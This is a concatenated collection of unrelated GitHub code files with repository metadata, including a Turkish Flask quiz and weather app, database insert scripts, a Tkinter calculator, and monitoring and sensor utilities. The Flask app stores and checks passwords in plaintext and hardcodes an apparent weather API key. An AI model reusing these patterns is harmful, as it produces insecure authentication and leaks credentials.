UserAnswer\nfrom flask import render_template,request,redirect,url_for\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm.exc import NoResultFound\nimport requests\nfrom flask_login import login_user, logout_user, current_user, login_required\n\n@app.route('/')\ndef index():\n return render_template('index.html',current_user=current_user)\n\n\nwith app.app_context():\n db.drop_all()\n db.create_all()\n\n quiz1 = Quiz(\n name=\"Python'da AI Geliştirme Sınavı\"\n )\n\n quiz2 = Quiz(\n name=\"Bilgisayar Görüşü Sınavı\"\n )\n\n quiz3 = Quiz(\n name=\"NLP (Nöro-Dilbilim) Sınavı\"\n )\n\n quiz4 = Quiz(\n name=\"Python Uygulamalarında AI Modelleri Sınavı\"\n )\n\n db.session.add_all([quiz1, quiz2, quiz3, quiz4])\n\n q1 = Question(\n question_text=\"Bir makine öğrenimi projesine başlamadan önce, veri ön işleme neden önemlidir?\",\n quiz_id=1, \n option1=\"Veri modelleme işlemleri daha hızlı gerçekleştirilir.\",\n option2=\"Verileri daha hızlı bir şekilde toplamak için gereklidir.\",\n option3=\"Verilerin doğruluğunu artırır ve modelin daha iyi performans göstermesini sağlar.\",\n option4=\"Veri ön işleme, projenin sonuçlarına hiçbir etki yapmaz.\",\n correct_option=3 \n )\n\n q2 = Question(\n question_text=\"Bir sinir ağı (neural network) eğitimi sırasında ikincil eksen dönüşümünün (data augmentation) temel amacı nedir?\",\n quiz_id=1,\n option1=\"Verilerin daha fazla özellikle zenginleştirilmesi.\",\n option2=\"Veri boyutunu azaltmak.\",\n option3=\"Overfitting'i (aşırı uydurma) önlemek ve modelin genelleme yapabilmesini sağlamak.\",\n option4=\"Verilerin doğruluğunu artırmak için kullanılır.\",\n correct_option=3\n )\n\n\n db.session.add_all([q1, q2])\n \n user1 = User(\n username=\"kullanici1\",\n password=\"parola1\"\n )\n\n user2 = User(\n username=\"kullanici2\",\n password=\"parola2\"\n )\n\n db.session.add_all([user1, user2])\n\n\n user_1_answer1 = UserAnswer(\n user_id=1,\n quiz_id=1,\n question_id=1,\n userOption=3\n )\n\n user_1_answer2 = UserAnswer(\n user_id=1,\n quiz_id=1,\n question_id=2,\n userOption=2\n )\n\n user_2_answer1 = UserAnswer(\n user_id=2,\n quiz_id=1,\n question_id=1,\n userOption=1\n )\n\n user_2_answer2 = UserAnswer(\n user_id=2,\n quiz_id=1,\n question_id=2,\n userOption=1\n )\n\n\n db.session.add_all([user_1_answer1, user_1_answer2, user_2_answer1, user_2_answer2])\n\n db.session.commit()\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n try:\n if request.method == 'POST':\n try:\n username = request.form['username']\n password = request.form['password']\n\n\n # Kullanıcıyı veritabanına ekleyin\n user = User(username=username, password=password)\n\n db.session.add(user)\n db.session.commit()\n except IntegrityError:\n return redirect(url_for('register_failed')) # Kullanıcı adı zaten varsa kayıt başarısız olur ileride değiştirilecek\n\n login_user(user)\n return redirect(url_for('dashboard'))\n return render_template('register.html', current_user=current_user)\n\n except :\n return redirect(url_for('register_failed'))\n\n\n@app.route('/register_failed', methods=['GET'])\ndef register_failed():\n return render_template('register_failed.html', current_user=current_user)\n\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n \n user = User.query.filter_by(username=username,password=password).first()\n\n if user:\n\n if username==user.username and password==user.password:\n login_user(user)\n return redirect(url_for('dashboard'))\n else:\n return redirect(url_for('login_failed'))\n else:\n return redirect(url_for('login_failed'))\n\n return render_template('login.html',current_user=current_user)\n\n\n@app.route('/logout', methods=['GET'])\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/dashboard')\n@login_required\ndef dashboard():\n all_quizzes = Quiz.query.all()\n quiz_results = []\n for quiz in all_quizzes:\n correct_answers = 0\n user_answers = UserAnswer.query.filter_by(user_id=current_user.id,quiz_id=quiz.id).all()\n if len(user_answers) == 0:\n pass\n else:\n for user_answer in user_answers:\n if user_answer.userOption == Question.query.get(user_answer.question_id).correct_option:\n correct_answers += 1\n\n\n quiz_results.append({\n 'quiz_name': quiz.name,\n 'score': correct_answers\n })\n\n return render_template('dashboard.html', quiz_results=quiz_results, current_user=current_user)\n\n\n@app.route('/login_failed', methods=['GET'])\ndef login_failed():\n return render_template('login_failed.html',current_user=current_user)\n\n\n\n@app.route('/weather', methods=['GET', 'POST'])\ndef weather():\n if request.method == 'POST':\n # HTML formundan gelen şehir adını alın\n city = request.form['city']\n\n # API'den hava durumu verilerini çekin\n url = f'http://api.weatherapi.com/v1/forecast.json?key={\"c46a7369afb341c88ba62039233008\"}&q={city}&days=3&lang=tr' # 3 günlük hava durumu verisi\n response = requests.get(url)\n\n if response.status_code == 200:\n data = response.json()\n\n # Hava durumu verilerini işleyin (örneğin, 3 günlük hava durumu)\n location = data['location']\n current = data['current']\n forecast = data['forecast']['forecastday']\n\n # Bugünkü hava durumu verileri\n current_weather = {\n 'location_name': location['name'],\n 'country': location['country'],\n 'temperature_c': current['temp_c'],\n 'temperature_f': current['temp_f'],\n 'is_day': current['is_day'],\n 'condition': current['condition']['text'],\n 'wind_speed_kph': current['wind_kph'],\n 'pressure_mb': current['pressure_mb'],\n 'precipitation_mm': current['precip_mm'],\n 'humidity': current['humidity'],\n 'cloud': current['cloud'],\n 'feelslike_c': current['feelslike_c'],\n 'feelslike_f': current['feelslike_f'],\n 'uv_index': current['uv'],\n 'gust_kph': current['gust_kph']\n }\n\n # 3 günlük hava durumu verileri\n weather_forecast = []\n\n for day_data in forecast:\n date = day_data['date']\n max_temp_c = day_data['day']['maxtemp_c']\n min_temp_c = day_data['day']['mintemp_c']\n max_temp_f = day_data['day']['maxtemp_f']\n min_temp_f = day_data['day']['mintemp_f']\n condition = day_data['day']['condition']['text']\n uv_index = day_data['day']['uv']\n \n weather_forecast.append({\n 'date': date,\n 'max_temp_c': max_temp_c,\n 'min_temp_c': min_temp_c,\n 'max_temp_f': max_temp_f,\n 'min_temp_f': min_temp_f,\n 'condition': condition,\n 'uv_index': uv_index\n })\n\n return render_template('weather.html', current_weather=current_weather, weather_forecast=weather_forecast, current_user=current_user)\n\n return render_template('weather.html', current_weather=None, weather_forecast=None, current_user=current_user)\n\n\n@app.route('/quizzes', methods=['GET', 'POST'])\ndef quizzes():\n datas=db.session.query(Quiz).all()\n return render_template('quizzes.html',quizzes=datas,current_user=current_user)\n\n\n@app.route('/quiz//', methods=['GET'])\n@login_required\ndef quiz(quiz_number,question_number):\n try:\n data=db.session.query(Question).filter(Question.quiz_id==quiz_number,Question.id==question_number).one()\n except NoResultFound:\n return redirect(url_for('quizzes'))\n else:\n question_text=data.question_text\n options=[data.option1,data.option2,data.option3,data.option4]\n return render_template('quiz.html', quiz_number=quiz_number,question_number=question_number, question_text=question_text, options=options, current_user=current_user)\n\n\n@app.route('/submit_answer', methods=['POST'])\n@login_required\ndef submit_answer():\n selected_option = request.form.get('answer')\n quiz_number = int(request.form.get('quiz_number'))\n question_number = int(request.form.get('question_number'))\n\n db.session.add(UserAnswer(user_id=current_user.id,quiz_id=quiz_number,question_id=question_number,userOption=selected_option))\n db.session.commit()\n\n allQuestionslen=len(db.session.query(Question).filter(Question.quiz_id==quiz_number).all())\n\n if question_number+1 <= allQuestionslen:\n return redirect(url_for('quiz', quiz_number=quiz_number, question_number=question_number+1))\n\n else:\n return redirect(url_for('dashboard'))\n\n# Liderlik tablosu için işlev\n@app.route('/leaderboard', methods=['GET'])\ndef leaderboard():\n # Tüm kullanıcıları al\n users = User.query.all()\n \n # Kullanıcıların skorlarını hesapla ve skora göre sırala\n leaderboard = []\n for user in users:\n user_score = calculate_user_score(user.id)\n leaderboard.append({'username': user.username, 'score': user_score})\n \n leaderboard = sorted(leaderboard, key=lambda x: x['score'], reverse=True)\n return render_template('leaderboard.html', leaderboard=enumerate(leaderboard),current_user=current_user)\n\n# Kullanıcının skorunu hesaplamak için işlev\ndef calculate_user_score(user_id):\n # Kullanıcının tüm cevaplarını al\n user_answers = UserAnswer.query.filter_by(user_id=user_id).all()\n \n # Kullanıcının doğru ve yanlış cevaplarını say\n correct_answers = 0\n wrong_answers = 0\n \n for answer in user_answers:\n question = Question.query.get(answer.question_id)\n if question.correct_option == answer.userOption:\n correct_answers += 1\n else:\n wrong_answers += 1\n \n # Skoru hesapla (örneğin, doğru cevapların sayısı)\n user_score = correct_answers\n \n return user_score","repo_name":"serhanayberkkilic/kodlandPrework","sub_path":"flaskApp/backend/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":11180,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35326403883","text":"import sqlite3\r\nconexao = sqlite3.connect('sqlite3.dados')\r\nsql = ''' \r\nINSERT INTO fornecedores (id, nome, endereco, produto) \r\nVALUES (5, 'Padaria do Pão', 'Rua das Carnes 56', 'Pão');\r\n'''\r\ncursor = conexao.cursor()\r\ncursor.execute(sql)\r\nconexao.commit()\r\nconexao.close()\r\n","repo_name":"mourinh/DADOS-01","sub_path":"insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19666770966","text":"# understand properly the range mistake and that didn't work.\n\n\n# logic: Given a time, chekc whether all cars can be get repaired or not.\n# if possible then decrease the time else increase the time.\n\n# Range: 1) start: given there is only one car wih only one mechanic with rank 1.\n# 2) end: given there is max possible car 10^6 and only one mechanic is given to repair all car with max possible rank i.e '100'.\n\n# we use high 10^14 because max(rank) = 100 and max(cars) = 10^6 so, r * n * n = 100 * 10^6 * 10^6 = 10^14\n\n# Note: for range try to generalise the value, don't think acc to the particular case . just generalise this.\n\n# time: O(n*log(10^14))\n\nclass Solution:\n def repairCars(self, ranks: List[int], cars: int) -> int:\n \n def isRepairPossible(minTime): # Given a time, chekc whether all cars can be get repaired or not.\n car= 0\n for rank in ranks:\n car+= int(math.sqrt(minTime/rank))\n return car >= cars\n \n n= len(ranks)\n start, end= 1, 100*(10**6)**2\n while start < end:\n mid= start + (end- start)//2\n # print(mid)\n if isRepairPossible(mid):\n end= mid\n else:\n start= mid + 1\n return start\n \n\n# my mistake in range:\n\n# start= (min(ranks) * cars**2) # when lowest rank mechanic repair all car\n# end= (max(ranks) * cars**2) # when max rank mechanic repair all car\n\n# why wrong?\n# Thought correct only but other mechanic can also work in parallel (any of them can work parallely)\n# But we are not sure that how many will work in parallel .\n# so this time our guess for range is not working.\n\n# when you are not sure i.e Q like this then, just generalise the start and end value (take number directly which can be start and end).","repo_name":"Ravi-0412/DSA-Program-And-Notes","sub_path":"Binary_Search/2594. Minimum Time to Repair Cars.py","file_name":"2594. Minimum Time to Repair Cars.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"21686129754","text":"import asyncio\nimport pickle\n\nfrom fructosa.fructosad import FructosaD\nfrom fructosa.conf import LAgentConf\nfrom fructosa.constants import (\n PROTO_STARTING_PROGRAM_MSG, PROTO_STOPPED_PROGRAM_MSG, PROTO_CANT_STOP_MSG,\n START_STOP_ERROR, NOT_RUNNING_MESSAGE, LAGENT_PROGRAM, PROTO_MEASUREMENT_MSG,\n LAGENT_TO_LMASTER_DATA_PORT_KEY, LMASTER_HOST_KEY,\n LAGENT_TO_LMASTER_CONNECTING_MSG, LAGENT_TO_LMASTER_CONNECTED_MSG,\n HEARTBEAT_START_SENDING_MSG_TEMPLATE, HEARTBEAT_PORT, HEARTBEAT_INTERVAL_SECONDS, # ?\n)\nfrom fructosa.maind import generic_main\nfrom fructosa.heartbeat import HeartbeatSource\n\n\nLAGENT_STARTING_MESSAGE = PROTO_STARTING_PROGRAM_MSG.format(program=LAGENT_PROGRAM)\nLAGENT_STOP_MESSAGE = PROTO_STOPPED_PROGRAM_MSG.format(program=LAGENT_PROGRAM)\nLAGENT_CANT_STOP_MESSAGE = PROTO_CANT_STOP_MSG.format(program=LAGENT_PROGRAM)\n\n\nclass LAgent(FructosaD):\n _starting_message = LAGENT_STARTING_MESSAGE\n _stopped_message = LAGENT_STOP_MESSAGE\n _cant_stop_message = LAGENT_CANT_STOP_MESSAGE\n\n def _create_queues(self):\n super()._create_queues()\n self._sensors_queue = asyncio.Queue()\n \n @property\n def sensors(self):\n return self._conf.sensors\n \n def run(self):\n self.submit_task(self.heartbeating)\n for sensor in self.sensors:\n self.submit_task(sensor, self._sensors_queue)\n self.submit_task(self.report_data)\n self.submit_task(self._send_to_graphite)\n super().run()\n\n async def report_data(self):\n while True:\n value = await self._sensors_queue.get()\n self.logger.debug(PROTO_MEASUREMENT_MSG.format(value))\n await self._to_graphite_queue.put(pickle.dumps(value))\n\n async def heartbeating(self):\n host = self._conf.lmaster[LMASTER_HOST_KEY]\n port = HEARTBEAT_PORT\n self.logger.info(\n HEARTBEAT_START_SENDING_MSG_TEMPLATE.format(\n master=host, hb_port=port\n )\n )\n hb = HeartbeatSource(\n host=host, port=port, logging_conf=self._conf.logging\n )\n while True:\n await hb()\n\n ############################################################################\n \n # old idea:\n \n # async def heartbeating(self): # ?\n # host = self._conf.lmaster[LMASTER_HOST_KEY] # ?\n # port = HEARTBEAT_PORT # ?\n # self.logger.info( # ?\n # HEARTBEAT_START_SENDING_MSG_TEMPLATE.format( # ?\n # master=host, hb_port=port # ?\n # ) # ?\n # ) # ?\n # hb_proto_factory = HeartbeatProtocolFactory(\n # HeartbeatClientProtocol, self._conf.logging) # ?\n # while True: # ?\n # await self._send_one_heartbeat(hb_proto_factory, host, port)\n\n # async def _send_one_heartbeat(self, factory, host, port):\n # transport, protocol = await self._event_loop.create_datagram_endpoint(\n # factory, remote_addr=(host, port)\n # )\n # # try: # ?\n # # await protocol.on_sent # ?\n # # finally: # ?\n # # transport.close() # ?\n # # await asyncio.sleep(HEARTBEAT_INTERVAL_SECONDS) # ?\n\n async def send_to_master(self):\n \"\"\"This coroutine is not used for now since the data are sent to \n Graphite directly.\n It remains here in case it is used in the future (or a variation of it)\n \"\"\"\n host = self._conf.lmaster[LMASTER_HOST_KEY]\n port = self._conf.lmaster[LAGENT_TO_LMASTER_DATA_PORT_KEY]\n self.logger.info(\n LAGENT_TO_LMASTER_CONNECTING_MSG.format(\n host_key=LMASTER_HOST_KEY, host=host,\n port_key=LAGENT_TO_LMASTER_DATA_PORT_KEY, port=port,\n )\n )\n reader, writer = await asyncio.open_connection(\n host, port, loop=self._event_loop,\n )\n self.logger.info(LAGENT_TO_LMASTER_CONNECTED_MSG)\n while True:\n message = await self._to_master_queue.get()\n writer.write(message)\n #writer.close()# not needed (?) review the protocol; is this correct?\n # # I think I should factorize this functionality in a client class\n\ndef main():\n generic_main(LAgentConf, LAgent)\n","repo_name":"palao/FrUCToSA","sub_path":"fructosa/lagent.py","file_name":"lagent.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28945734880","text":"from json import load\n\nimport lzma\nimport zlib\nfrom time import time\n\nclass CompressionTest:\n def __init__(self):\n self.load_data()\n self.run_lzma()\n self.run_zlib()\n\n def load_data(self):\n f = open(\"json_data.txt\", \"r\")\n self.data = load(f)\n self.raw_data = str(self.data).encode('utf-8')\n f.close()\n\n def get_data(self):\n return self.data\n\n def run_lzma(self):\n start = time()\n self.lzma_compressed = lzma.compress(self.raw_data)\n self.lzma_compress_time = time() - start\n\n start = time()\n lzma.decompress(self.lzma_compressed)\n self.lzma_decompress_time = time() - start\n\n def run_zlib(self):\n start = time()\n self.zlib_compressed = zlib.compress(self.raw_data)\n self.zlib_compress_time = time() - start\n\n start = time()\n zlib.decompress(self.zlib_compressed)\n self.zlib_decompress_time = time() - start\n\n def print_stats(self):\n print(\"Data Length (objs):\", len(self.data))\n print(\"Data Length (bytes):\", len(self.raw_data))\n\n print(\"LZMA Compressed Length:\", len(self.lzma_compressed))\n print(\"ZLib Compressed Length:\", len(self.zlib_compressed))\n\n print(\"LZMA Compress Time:\", self.lzma_compress_time)\n print(\"ZLib Compress Time:\", self.zlib_compress_time)\n\n print(\"LZMA Decompress Time:\", self.lzma_decompress_time)\n print(\"ZLib Decompress Time:\", self.zlib_decompress_time)\n\n print(\"\")\n print(\"LZMA Compression Ratio:\", 1.0 - float(len(self.lzma_compressed))/float(len(self.raw_data)))\n print(\"ZLib Compression Ratio:\", 1.0 - float(len(self.zlib_compressed))/float(len(self.raw_data)))\n\n\ndef main():\n ct = CompressionTest()\n ct.print_stats()\n\nif __name__ == \"__main__\": main()","repo_name":"mattjegan/CompressionBenchmarks","sub_path":"compression_test.py","file_name":"compression_test.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27876279575","text":"\"\"\"24.36. Скласти програму з графічним інтерфейсом для \r\nреалізації простого калькулятора. Калькулятор повинен мати \r\nнабір кнопок для введення цифр та арифметичних дій а також \r\nвікно для виведення результату як на рисунку нижче.\"\"\"\r\n\r\nfrom tkinter import *\r\n\r\nclass CalculatorGui:\r\n\r\n def __init__(self, form):\r\n self.equation = ''\r\n self.frame = form\r\n self.frame.title('Calculator')\r\n self.def_font = ('arial', 16)\r\n\r\n self.operators = ['C', '**', 'sqrt', '/', '*', '+', '-']\r\n self.symbs = ['C', '^', 'sqrt', '/', 7, 8, 9, '*', 4, 5, 6, '+', 1, 2, 3, '-', 0, '=']\r\n\r\n self.ans_label = Label(self.frame, font=self.def_font)\r\n self.ans_label.grid(row=0, column=0, columnspan=4)\r\n self.frame.grid_rowconfigure(0, weight=1)\r\n for symb in self.symbs:\r\n self.create_button(symb, 1+self.symbs.index(symb)//4, self.symbs.index(symb)%4)\r\n\r\n def create_button(self, name, i, j):\r\n self.symb_button = Button(self.frame, font=self.def_font, text=name, width=3, \r\n command=lambda name=name: self.operation(name))\r\n self.frame.grid_rowconfigure(i, weight=1)\r\n self.frame.grid_columnconfigure(j, weight=1)\r\n self.symb_button.grid(row=i, column=j, sticky='nsew')\r\n if name == '=':\r\n self.symb_button.grid(columnspan=3)\r\n\r\n def operation(self, name):\r\n if name == '+' and self.equation[-1] not in self.operators:\r\n self.equation += '+'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '-' and self.equation[-1] not in self.operators:\r\n self.equation += '-'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '*' and self.equation[-1] not in self.operators:\r\n self.equation += '*'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '/' and self.equation[-1] not in self.operators:\r\n self.equation += '/'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '^' and self.equation[-1] not in self.operators:\r\n self.equation += '**'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == 'sqrt' and self.equation[-1] not in self.operators:\r\n self.equation += '**(1/2)'\r\n self.ans_label.configure(text=self.equation)\r\n elif name == 'C':\r\n self.equation = ''\r\n self.ans_label.configure(text=self.equation)\r\n elif name == '=' and self.equation[-1] not in self.operators:\r\n self.equation = str(eval(self.equation))\r\n self.ans_label.configure(text=self.equation)\r\n \r\n for num in range(10):\r\n if num == name:\r\n self.equation += str(name)\r\n self.ans_label.configure(text=self.equation)\r\n \r\nif __name__ == '__main__':\r\n top = Tk()\r\n calculator = CalculatorGui(top)\r\n top.mainloop()","repo_name":"CrazyDuck192/PythonTasks","sub_path":"24.36.py","file_name":"24.36.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14975392042","text":"import os\nimport os.path\n\nimport templar\nimport utils\n\n\nclass YumGen:\n\n def __init__(self, collection_mgr):\n \"\"\"\n Constructor\n \"\"\"\n self.collection_mgr = collection_mgr\n self.api = collection_mgr.api\n self.distros = collection_mgr.distros()\n self.profiles = collection_mgr.profiles()\n self.systems = collection_mgr.systems()\n self.settings = collection_mgr.settings()\n self.repos = collection_mgr.repos()\n self.templar = templar.Templar(collection_mgr)\n\n def get_yum_config(self, obj, is_profile):\n \"\"\"\n Return one large yum repo config blob suitable for use by any target system that requests it.\n \"\"\"\n\n totalbuf = \"\"\n\n blended = utils.blender(self.api, False, obj)\n\n input_files = []\n\n # tack on all the install source repos IF there is more than one.\n # this is basically to support things like RHEL5 split trees\n # if there is only one, then there is no need to do this.\n\n included = {}\n for r in blended[\"source_repos\"]:\n filename = self.settings.webdir + \"/\" + \"/\".join(r[0].split(\"/\")[4:])\n if filename not in included:\n input_files.append(filename)\n included[filename] = 1\n\n for repo in blended[\"repos\"]:\n path = os.path.join(self.settings.webdir, \"repo_mirror\", repo, \"config.repo\")\n if path not in included:\n input_files.append(path)\n included[path] = 1\n\n for infile in input_files:\n try:\n infile_h = open(infile)\n except:\n # file does not exist and the user needs to run reposync\n # before we will use this, cobbler check will mention\n # this problem\n totalbuf += \"\\n# error: could not read repo source: %s\\n\\n\" % infile\n continue\n\n infile_data = infile_h.read()\n infile_h.close()\n outfile = None # disk output only\n totalbuf += self.templar.render(infile_data, blended, outfile, None)\n totalbuf += \"\\n\\n\"\n\n return totalbuf\n","repo_name":"shenson/cobbler","sub_path":"cobbler/yumgen.py","file_name":"yumgen.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"25981193414","text":"import time\nimport time\nimport struct\nimport smbus2\nimport pi_steer.debug as db\n\n_CONVERSION_REGISTER = 0x00\n_CONFIG_REGISTER = 0x01\n_CONFIGURATION = 0b0100_0100_1010_0011\n\nclass ADS1115():\n def __init__(self, address, debug=False):\n self.i2c = smbus2.SMBus(1)\n self.address = address \n self.debug = debug\n\n self.i2c.write_i2c_block_data(self.address, _CONFIG_REGISTER, [0b0100_0010, 0b1010_0011])\n time.sleep(0.1)\n if debug:\n db.write('ADS1115 configuration {}'.format(self.i2c.read_i2c_block_data(self.address, _CONFIG_REGISTER, 2)))\n\n def read(self):\n data = self.i2c.read_i2c_block_data(self.address, _CONVERSION_REGISTER, 2)\n return struct.unpack('>h', bytes(data) )[0]\n","repo_name":"salmiac/pi-steer","sub_path":"pi-steer/pi_steer/ads1115.py","file_name":"ads1115.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"21526246829","text":"# coding: utf-8\nimport time\nimport pymysql.cursors\nfrom profilehooks import profile\n\n\n@profile\ndef insert_to_mysql(connection, n, start):\n try:\n with connection.cursor() as cursor:\n for i in xrange(n):\n sql = \"INSERT INTO `ab3` (`a`, `b`) VALUES (%s, %s)\"\n cursor.execute(sql, (str(i) + str(start), str(start) + str(i)))\n connection.commit()\n\n finally:\n connection.close()\n\n\n\ndef main():\n connection = pymysql.connect(host='localhost',\n user='root',\n password='',\n db='testdb',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\n start = int(time.time())\n insert_to_mysql(connection, 10000, start)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"binderclip/code-snippets-python","sub_path":"packages/mysql_snippets/batch_insert_performance.py","file_name":"batch_insert_performance.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"3"} +{"seq_id":"73110168080","text":"import argparse\nfrom distutils.command.build import build\nfrom signal import default_int_handler\n\nimport yaml\nfrom ml_collections import config_dict\n\n\"\"\" NEW RULES\n1) each class has a dedicated builder/cfg\n2) every class cfg variable is explicitly assigned\n3) variables that determine conditionals must be defined globally in main, \n OR must be passed as an inline parameter to a cfg builder\n4) \n\"\"\"\n\n\ndef build_wm_cfg(**kwargs):\n encoder_config = config_dict.ConfigDict()\n encoder_config.image_channels = kwargs.get(\"image_channels\", 1)\n encoder_config.cnn_depth = kwargs.get(\"cnn_depth\", 48)\n\n rssm_config = config_dict.ConfigDict()\n # rssm_config.action_dim = 4\n rssm_config.deter_dim = kwargs.get(\"deter_dim\", 1024)\n rssm_config.embed_dim = encoder_config.cnn_depth*32\n rssm_config.stoch_dim = kwargs.get(\"stoch_dim\", 32)\n rssm_config.stoch_rank = kwargs.get(\"stoch_rank\", 32)\n rssm_config.hidden_dim = kwargs.get(\"hidden_dim\", 1000)\n rssm_config.gru_layers = kwargs.get(\"gru_layers\", 1)\n\n decoder_config = config_dict.ConfigDict()\n decoder_config.image_channels = encoder_config.image_channels\n decoder_config.image_weight = kwargs.get(\"image_weight\", 2.0)\n decoder_config.cnn_depth = encoder_config.cnn_depth\n\n wm_config = config_dict.ConfigDict()\n wm_config.encoder_config = encoder_config\n wm_config.rssm_config = rssm_config\n wm_config.decoder_config = decoder_config\n wm_config.kl_balance = kwargs.get(\"kl_balance\", 0.8)\n wm_config.kl_weight = kwargs.get(\"kl_weight\", 0.1)\n wm_config.features_dim = rssm_config.deter_dim + \\\n rssm_config.stoch_dim*rssm_config.stoch_rank\n\n return wm_config\n\n\ndef build_rssm_trainer_config(env_name, train_device, **kwargs):\n optimizer = config_dict.ConfigDict()\n optimizer.lr = kwargs.get(\"lr\", 3e-4)\n optimizer.eps = kwargs.get(\"eps\", 1e-5)\n\n checkpoints = config_dict.ConfigDict()\n checkpoints.do_checkpoint = kwargs.get(\"do_checkpoint\", True)\n checkpoints.savepoints = [1000, 5000, 10000, 50000,\n 100000, 200000, 500000, 1000000, 1500000, 2000000]\n checkpoints.path = \"../checkpoints/bipedalwalker/\" if env_name == \"bipedalwalker\" else \"../checkpoints/breakout/\"\n\n validation = config_dict.ConfigDict()\n validation.do_val = kwargs.get(\"do_val\", True)\n validation.seq_len = kwargs.get(\"val_seq_len\", 50)\n validation.batch_size = kwargs.get(\"val_batch_len\", 128)\n\n trainer_config = config_dict.ConfigDict()\n trainer_config.checkpoints = checkpoints\n trainer_config.validation = validation\n trainer_config.seq_len = kwargs.get(\"train_seq_len\", 50)\n trainer_config.batch_size = kwargs.get(\"train_batch_len\", 50)\n trainer_config.train_device = train_device\n\n return trainer_config\n\n\ndef build_featurizer_cfg(wm_cfg, env_name):\n featurizer_cfg = config_dict.ConfigDict()\n featurizer_cfg.wm_cfg = wm_cfg\n featurizer_cfg.update(build_dataset_cfg(env_name))\n featurizer_cfg.seq_len = 1\n featurizer_cfg.batch_size = 500\n return featurizer_cfg\n\n\ndef build_dataset_cfg(env_name):\n dataset_cfg = config_dict.ConfigDict()\n dataset_cfg.data_keys = [\"action\", \"obs\", \"reset\"]\n if env_name == \"breakout\":\n dataset_cfg.pixel_mean = 33.0\n dataset_cfg.pixel_std = 55.0\n dataset_cfg.action_type = \"discrete\"\n\n elif env_name == \"bipedalwalker\":\n dataset_cfg.pixel_mean = 210.0\n dataset_cfg.pixel_std = 48.0\n dataset_cfg.action_type = \"continuous\"\n dataset_cfg.batch_size = 50\n dataset_cfg.seq_length = 50\n\n\ndef build_ac_trainer_cfg(env_name, args, ac_dataset_cfg):\n ac_trainer_config = config_dict.ConfigDict()\n # should split this up by trainer and policy classes\n ac_trainer_config.lr = 3e-4\n ac_trainer_config.gamma = 0.95\n ac_trainer_config.layers = 8\n ac_trainer_config.entropy = 0.003\n ac_trainer_config.use_sb3 = args.use_sb3\n ac_trainer_config.wm_path = ac_dataset_cfg.wm_path\n ac_trainer_config.actor_dist = \"onehot\"\n ac_trainer_config.actor_grad = \"reinforce\"\n ac_trainer_config.batch_size = 512\n ac_trainer_config.seq_length = 15\n ac_trainer_config.hidden_dim = 256\n ac_trainer_config.lambda_gae = 0.95\n\n ac_trainer_config.imag_horizon = 15\n ac_trainer_config.action_dim = 4\n\n ac_trainer_config.load_device = args.load_device\n ac_trainer_config.train_device = args.train_device\n\n ac_trainer_config.do_checkpoint = True\n ac_trainer_config.checkpoint_path = \"../checkpoints/breakout/\" if env_name == \"breakout\" else \"../checkpoints/bipedalwalker/\"\n ac_trainer_config.target_interval = 100\n\n validation = config_dict.ConfigDict()\n validation.n_games = 12\n validation.n_envs = 12\n ac_trainer_config.validation = validation\n\n\ndef build_ac_dataset_cfg(env_name, use_sb3):\n ac_dataset_cfg = config_dict.ConfigDict()\n if env_name == \"breakout\":\n if use_sb3:\n ac_dataset_cfg.wm_path = \"../checkpoints/breakout/sb3/sb3-model-1000000_steps.pth\"\n ac_dataset_cfg.cached_features_path = \"../data/breakout/sb3-features-cached.npz\"\n else:\n ac_dataset_cfg.wm_path = \"../checkpoints/breakout/d4rl/model-1000000_steps.pth\"\n ac_dataset_cfg.cached_features_path = \"./data/breakout/exp-v2-cached.npz\"\n elif env_name == \"bipedalwalker\":\n ac_dataset_cfg.wm_path = \"../checkpoints/bipedalwalker/model-2000000_steps.pth\"\n ac_dataset_cfg.cached_features_path = \"../data/bipedalwalker/sb3-features-cached.npz\"\n ac_dataset_cfg.episode_limit = 100\n ac_dataset_cfg.seq_length\n ac_dataset_cfg.load_device\n ac_dataset_cfg.use_cached_features\n\n\ndef build_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_device', default=\"cuda:0\")\n parser.add_argument('--load_device', default=\"cpu\")\n parser.add_argument(\"--env_name\", default=\"breakout\")\n parser.add_argument(\"--use_d4rl\", dest=\"use_sb3\",\n action=\"store_false\") # this defaults to use_sb3 == True\n return parser.parse_args()\n\n\ndef main():\n args = build_args()\n cfg = config_dict.ConfigDict()\n cfg.wm_config = build_wm_cfg()\n cfg.ac_dataset_config = build_ac_dataset_cfg(\n cfg.wm_config, args.env_name, 